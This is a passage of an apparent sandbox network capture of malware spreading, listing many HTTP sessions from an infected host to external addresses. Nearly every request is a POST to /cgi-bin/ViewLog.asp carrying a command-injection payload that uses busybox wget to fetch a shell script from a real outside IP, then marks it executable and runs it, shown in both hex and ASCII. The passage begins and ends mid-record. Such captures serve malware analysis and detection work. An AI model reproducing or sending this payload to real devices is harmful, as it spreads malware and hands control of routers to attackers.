                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:30.294753075 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            127192.168.2.234511231.136.26.918080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:08.193536997 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:08.866151094 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:10.242003918 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:12.993566036 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:18.625901937 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:29.631302118 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:51.388151884 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:36.437972069 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            128192.168.2.234453685.238.195.918080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:08.198116064 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            129192.168.2.235617495.140.22.2288080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:08.201020956 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:08.431982994 CET337INHTTP/1.1 405 Not Allowed
                                                            Server: Web server
                                                            Date: Wed, 14 Feb 2024 08:28:04 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 155
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>Web server</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            130192.168.2.234322894.121.153.2348080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:08.232166052 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            131192.168.2.235251031.200.75.178080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:08.232559919 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            132192.168.2.234607094.120.32.1408080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:08.233601093 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            133192.168.2.233371694.123.154.2238080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:08.233860970 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            134192.168.2.235453894.123.184.1168080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:08.233911991 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            135192.168.2.234875094.122.118.828080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:08.233963013 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            136192.168.2.235681895.86.102.58080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:08.239783049 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            137192.168.2.233642431.44.130.718080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:08.418734074 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            138192.168.2.235907895.124.240.2548080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:08.430282116 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:08.698590040 CET506INHTTP/1.1 404 Not Found
                                                            Content-Type: text/html
                                                            Content-Length: 341
                                                            Connection: close
                                                            Date: Wed, 14 Feb 2024 08:28:08 GMT
                                                            Server: lighttpd/1.4.54
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 Not Found</title> </head> <body> <h1>404 Not Found</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            139192.168.2.235577294.70.230.588080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:08.438935995 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            140192.168.2.234520494.250.200.38080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:08.886817932 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:09.002958059 CET207INHTTP/1.1 404 Not Found
                                                            Content-Type: text/plain; charset=utf-8
                                                            X-Content-Type-Options: nosniff
                                                            Date: Wed, 14 Feb 2024 08:28:08 GMT
                                                            Content-Length: 19
                                                            Connection: close
                                                            Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                            Data Ascii: 404 page not found


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            141192.168.2.235436894.102.49.1188080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:08.972650051 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:09.171432972 CET198INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:28:09 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 0
                                                            Connection: keep-alive
                                                            Access-Control-Allow-Origin: *


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            142192.168.2.233643062.72.9.218080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:09.006477118 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:09.236103058 CET465INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx/1.22.1
                                                            Date: Wed, 14 Feb 2024 08:28:09 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 169
                                                            Connection: keep-alive
                                                            Location: https://192.168.0.14:8443/cgi-bin/ViewLog.asp
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            143192.168.2.234398862.29.15.1548080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:09.016829967 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
